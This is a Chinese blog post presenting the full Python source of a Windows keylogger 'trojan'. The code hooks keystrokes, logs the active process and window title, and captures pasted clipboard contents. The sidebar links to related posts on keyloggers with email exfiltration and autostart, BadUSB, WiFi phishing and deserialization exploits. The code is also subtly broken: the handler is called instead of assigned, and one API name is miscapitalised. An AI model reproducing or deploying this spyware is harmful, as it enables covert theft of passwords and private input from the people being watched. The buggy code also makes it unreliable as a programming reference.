python实现键盘记录木马

最新推荐文章于 2024-02-24 14:38:10 发布
最新推荐文章于 2024-02-24 14:38:10 发布
阅读量9.1k 收藏 40
点赞数 1
分类专栏: 渗透测试 文章标签: python 木马 windows 键盘记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cd_xuyue/article/details/50688748
版权

pyHook

第三方库,用于捕捉特定的Windows事件,封装了所有底层调用,我们
只需要关注程序逻辑。

更多内容及使用方法请自行查找
下载链接:http://sourceforge.net/projects/pyhook/

主干逻辑图

当程序运行后,每当用户在键盘按下一个键,就会触发钩子函数,调用 键盘记录函数 记录按键内容,该函数又会调用 进程切换函数 来应对焦点窗口切换的情况并打印出相应的进程名称。

这里写图片描述

代码及注释

引用及定义部分

# !/usr/bin/env python
#  -*- coding: utf-8 -*-
__author__ = 'xy'

from ctypes import *
import pythoncom
import pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None

进程切换函数

def get_current_process():
    # 获得窗口句柄
    hwnd = user32.GetForegroundWindow()

    # 获得进程ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessID(hwnd, byref(pid))

    # 保存当前进程ID
    process_id = "%d" % pid.value

    # 申请内存
    executable = create_string_buffer("\x00" * 512)

    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

    psapi.GetModuleBaseName(h_process, None, byref(executable), 512)

    # 读取窗口标题
    window_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(window_title), 512)

    # 输出
    print "\n [ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)

    # 关闭句柄
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)

键盘记录函数

def KeyStroke(event):

    global current_window

    # 检查目标是否切换窗口
    if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()

    # 检测按键是否为常规键
    if event.Ascii > 32 and event.Ascii < 127:
        print chr(event.Ascii),

    else:
        # 如果输入为ctrl-v 则获取剪贴板内容
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()

            print "[PASTE] - %s" % (pasted_value),

        else:
            print "[%s]" % event.Key,

    return True

主函数

# 创建和注册钩子函数管理器
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke()

# 注册键盘记录的钩子并永久执行
kl.HookKeyboard()
pythoncom.PumpMessages()
Xyntax
关注
  • 1
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
python点击按键句柄_学习python窗口句柄、后台鼠标点击等知识笔记
weixin_39954908的博客
12-08 3669
获取句柄:(ParentName为对应窗口的完整名称(字符串),实在确定不了可以用按键抓抓的句柄抓取获得)parent = win32gui.FindWindow(0,ParentName)获取句柄:(ChildClass为子句柄的类名(字符串))child= win32gui.FindWindowEx(parent,None,ChildClass, None)鼠标点击(可后台):(hwnd为需...
chatgpt赋能pythonPython获取窗口句柄并模拟点击按钮
findyi123的博客
05-28 1820
Windows操作系统中,每个打开的窗口都有一个唯一的标识符,称为“句柄”。句柄操作系统为应用程序分配的一种标识符,可以用来访问和操作窗口。Python提供了一个库(pywin32)来访问Windows API,可以使用它来获取窗口句柄。本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。
python实现键盘记录器小功能代码
02-07
python实现键盘记录器小功能代码 博客记录: https://lexsaints.blog.csdn.net/article/details/113736987
[python]python监听、操作键盘鼠标库pynput详细教程
最新发布
FL1768317420的博客
02-24 2048
因此,除了最后一个监听器外,其他监听器不能用listener.join()的方式启动,只能用非阻塞的listener.start()的方式启动。程序调用监听器的join()方法后,即被阻塞,不再执行后面的语句,以这种方式启动监听器,只能监听在某个监听器的join()方法调用前已启动的监听器的消息。7.【鼠标监听,方式2】根据这种监听方式特点,方便区分,我给它命名为:event监听方式。4.【鼠标监听,方式1】根据这种监听方式特点,方便区分,我给它命名为:listener监听方式。
python+selenium学习4多窗口处理+键盘操作+警告框处理
ljm_99的博客
12-27 690
""" 1、打开淘宝 2、点击聚划算 3、退回返回淘宝页面 句柄(handler):每一个页面都有一个值,对于页面来说是唯一的,是页面的一个标识 driver:是绑定句柄页面,只能控制绑定的页面 获取当前窗口的句柄:driver.current_window_handle 拿到聚划算的句柄 driver.window_handles----->拿到所有的句柄 """ from selenium import webdriver import time driver =webdriver.
chatgpt赋能pythonPython获取窗口句柄自动输入文本
xuhss_com的博客
06-27 748
Windows 操作系统中,每个打开的窗口都有一个唯一的标识句柄,我们可以使用这个句柄来访问和控制这个窗口。获取窗口句柄是通过 Windows API 实现的, Python 中可以使用 ctypes 库来调用这些 API。本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。
Python简单监控键盘输入的木马实现
热门推荐
以笔为剑的唐吉坷德
06-02 6万+
由于文章制作的木马没有隐藏,实现的功能简单,没有危险性,故将木马开源,大神勿笑。请勿进行非法木马改造。一,所需python木马目标运行环境为windows。使用的python类库为 pyHook(获取用户行为,安装提示见本人其他博文) pywin32(提供windows下的python接口,比如pythoncom) py2exe(由于木马目标运行环境为windows,该类库可以将pyth
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第八章 windows常见特洛伊木马任务(2)截屏
阿尔泰野狼的博客
10-21 784
本文记录了博主在阅读Black Hat Python 2nd Edition过程中的心得与踩坑经历。
第六篇 键盘中断与应用程序读取键盘缓冲区
ON THE WAY TO GEEK
11-13 6561
这篇博文主要介绍在X86下键盘的中断过程,以及应用程序如何利用中断读取键盘缓冲区内容。   一、撰写该篇博文的背景介绍 在我们全屏看视频时,按下Esc键,播放器还原或者最小化;在利用其他软件的时候,我们会 发现,设置可以设置打开或关闭程序的快捷方式...... 应用程序为什么可以根据键盘的指示工作?又是如何工作的呢?   二、对于键盘中断的介绍 当我们在按下按键时,键盘会把按键的扫
自制操作系统13:移动鼠标 - 中断机制探秘,键盘中断识别具体键值,键盘缓冲区
hb_zxl的专栏
05-22 453
参考:https://blog.csdn.net/tyler_download/article/details/52770376https://www.bilibili.com/video/BV1VJ41157wq?p=13https://weread.qq.com/web/reader/38732220718ff5cf3877215k9f6326602389f61408e3715 上节只是捕获了按键,然后打印出来事件,但并不知道按了哪个键。 今天我们继续加油吧。鼠标不动的原因已经大体弄清楚了,主要是由于设
python实现键盘记录木马_python键盘监听木马(SMTP信箱收取监听结果、修改注册表自启动)...
weixin_39980129的博客
12-09 988
最近接触了python的win32库,库子提供了不少可用于windows开发的API,这里就利用这个为原理制作一个键盘监听木马的雏形。这里需要使用额外的模块pythonHook(放置钩子时),pythoncom主要监听功能相关代码:#放置键盘监听钩子def seeing():PH=pyHook.HookManager()PH.KeyDown=KeyboardEventPH.HookKeyboard...
Python记录键盘.rar
11-05
Python记录键盘.rar
Tk.rar_python_键盘记录
09-15
只是一个简简单单的键盘记录Python程序
python 实现控制鼠标键盘
01-19
1、安装类库 pip install pyautogui 2、代码: import pyautogui,time,random pyautogui.PAUSE = 3 pyautogui.FAILSAFE = True width, height = pyautogui.size() #print(str(width)) #print(str(height)) ...
Python告诉你木马程序的键盘记录原理
09-19
今天小编就为大家分享一篇关于Python告诉你木马程序的键盘记录原理,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
BadUSB原理浅析及制作指南
乐枕的家
01-12 4万+
何为BadUsb简介通过硬件直接插入对方电脑,让对方电脑执行代码,达到干扰、控制主机或者窃取信息等目的。威胁BadUSB的威胁在于:恶意代码存在于U盘的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB的攻击。原理硬件知识基础HID攻击HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备
自动化WiFI钓鱼工具——WiFiPhisher源码解读
乐枕的家
08-28 1万+
自动化WiFI钓鱼工具——WiFiPhisher源码解读目录自动化WiFI钓鱼工具WiFiPhisher源码解读 目录 工具介绍 攻击原理 准备工作 源码解读工具介绍开源无线安全工具Wifiphisher是基于MIT许可模式的开源软件,运行于Kali Linux之上。 github.com/sophron/wifiphisher 它能够对WPA加密的AP无线热点实施自动化钓鱼攻击,获取密码账户。
JAVA反序列化exp及使用方法
乐枕的家
12-09 1万+
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波 exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本. 其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包. 更多信息在
记一次曲折的渗透测试经历
乐枕的家
04-21 1万+
昨天把jexboss脚本整合到我的多线程框架里,扫了一遍全国jboss,发现一千多个shell.工具地址在:https://github.com/Xyntax/POC-T随意拿了一个看似大厂商的,作本次入侵测试发现传送门通过jexboss拿到shell,看到是centos的机器(IP已打码).看起来是root,确认一下.不稳定的传送门shell的问题接下来执行命令的时候,发现这个jexboss自带的
python实现键盘自动按键
10-04
Python可以通过使用第三方库pyautogui来实现键盘的自动按键。PyAutoGUI是一个跨平台的Python模块,可以模拟使用键盘和鼠标进行自动化操作。 首先,我们需要在Python环境中安装pyautogui库。可以使用pip命令执行以下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值